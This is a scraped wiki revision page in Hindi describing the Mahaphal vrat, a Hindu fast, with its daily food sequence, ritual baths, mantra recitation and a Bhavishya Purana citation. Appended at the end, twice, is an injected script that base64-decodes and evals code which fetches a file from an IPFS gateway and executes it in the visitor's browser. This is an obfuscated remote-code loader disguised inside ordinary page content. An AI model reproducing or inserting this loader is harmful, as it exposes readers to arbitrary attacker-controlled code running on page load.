Difference between revisions of "महाफल व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (महाफलव्रत का नाम बदलकर महाफल व्रत कर दिया गया है)
m (Text replace - ")</ref" to "</ref")
 
(4 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*एक पक्ष के लिए, चार मासों या एक वर्ष के लिए किया जाता है।  
 
*एक पक्ष के लिए, चार मासों या एक वर्ष के लिए किया जाता है।  
 
*कर्ता को पहली से पन्द्रहवीं तिथि तक कुछ वस्तुओं को ही खाना पड़ता है।  
 
*कर्ता को पहली से पन्द्रहवीं तिथि तक कुछ वस्तुओं को ही खाना पड़ता है।  
Line 6: Line 6:
 
*व्रत के एक दिन पूर्व तीन बार स्नान किया जाता है।
 
*व्रत के एक दिन पूर्व तीन बार स्नान किया जाता है।
 
*इस व्रत में वैदिक मन्त्रों, गायत्री आदि का पाठ किया जाता है।  
 
*इस व्रत में वैदिक मन्त्रों, गायत्री आदि का पाठ किया जाता है।  
*इससे बहुत से पुण्य होते है।
+
*इससे बहुत से पुण्य होते हैं।
*वह अन्त में सूर्यलोक को जाता है।<ref>हेमाद्रि (व्रत0 2, 392-394, [[भविष्य पुराण]] से उद्धरण)</ref>  
+
*वह अन्त में सूर्यलोक को जाता है।<ref>हेमाद्रि (व्रत0 2, 392-394, [[भविष्य पुराण]] से उद्धरण</ref>  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:57, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • ek paksh ke lie, char masoan ya ek varsh ke lie kiya jata hai.
  • karta ko pahali se pandrahavian tithi tak kuchh vastuoan ko hi khana p data hai.
  • vastuoan ka kram kuchh yooan hai–doodh, pushp, sabhi prakar ka bhojan, kintu namak nahian, til, doodh, ghi, pushp, tarakariyaan, bel, ata, apakv bhojan, upavas, doodh mean chaval evan gu d (ubala hua), jau, gomootr evan kush se pavitr kiya hua jal hota hai.
  • in sabhi dinoan tak ek nishchith tithi ka prayog hota hai.
  • vrat ke ek din poorv tin bar snan kiya jata hai.
  • is vrat mean vaidik mantroan, gayatri adi ka path kiya jata hai.
  • isase bahut se puny hote haian.
  • vah ant mean sooryalok ko jata hai.[1]


tika tippani aur sandarbh

  1. hemadri (vrat0 2, 392-394, bhavishy puran se uddharan

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>